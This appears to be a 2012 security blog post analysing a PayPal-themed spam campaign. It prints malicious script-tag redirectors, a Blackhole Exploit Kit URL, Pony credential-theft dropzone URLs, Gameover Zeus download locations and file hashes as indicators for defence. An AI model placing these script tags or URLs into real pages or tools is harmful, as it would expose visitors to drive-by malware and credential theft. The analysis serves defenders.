You sent a payment

The spam hits kept a rollin’ today. On 2012-04-02 we observed a Paylpal-themed spam campaign.

The spam sample that we analyzed had a subject line of “You sent a payment.” This sample contained the following malicious links:

The malicious pages contained the following javascript redirectors:

<script type=”text/javascript” src=”http://hirochan.boo.jp/7PMiDL3p/js.js”></script&gt;
<script type=”text/javascript” src=”http://renovation-nantes.com/NCAsBwpU/js.js”></script&gt;
<script type=”text/javascript” src=”http://ncworld.in/bgGdzvBh/js.js”></script&gt;

The javascripts redirected victims to a Blackhole Exploit Kit at http://50.56.223.113:8080/showthread.php?t=d7ad916d1c0396ff.

Note that we previously saw the the IP 50.56.223.113 used as a dropzone for the Pony downloader variant used in the attack documented in our post US Airways online check-in. This is a pattern weve observed in the past were IPs were used both to host Blackhole Exploit kits and Pony downloader drop zones.

The Blackhole kit at 50.56.223.113 dropped a Pony downloader variant with the following properties:

File: info.exe
Size: 94761
MD5: C150FCEA73F3B2904BBEBE0E601B53AC

This Pony downloader variant was configured to send stolen FTP and web admin credentials to the following dropzeons:

http://50.56.223.113:8080/pony/gate.php
http://91.121.178.156:8080/pony/gate.php

The Pony variant also downloaded a Gameover Zeus variant from the following locations:

http://haine-fashion.ro/bLXJU5o.exe
http://hermanosbrando.es/8xsfW5.exe
http://confeitariadossonhos.com.br/Wo4RUjB.exe

The Gameover variant had the following properties:

Size: 297512
MD5: 1E3AA9BCFB6300F426030532821525EA

This variant had a botid of “NRa3”. Note that the day counter in the botid had been incremented to 3. This is significant because we analayzed this sample at approximately 8pm EDT on 2012-04-02. That the botid had be incremented to 3 suggests that the bot was compiled in and distributed from a different timezone … perhaps somewhere in Europe?

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: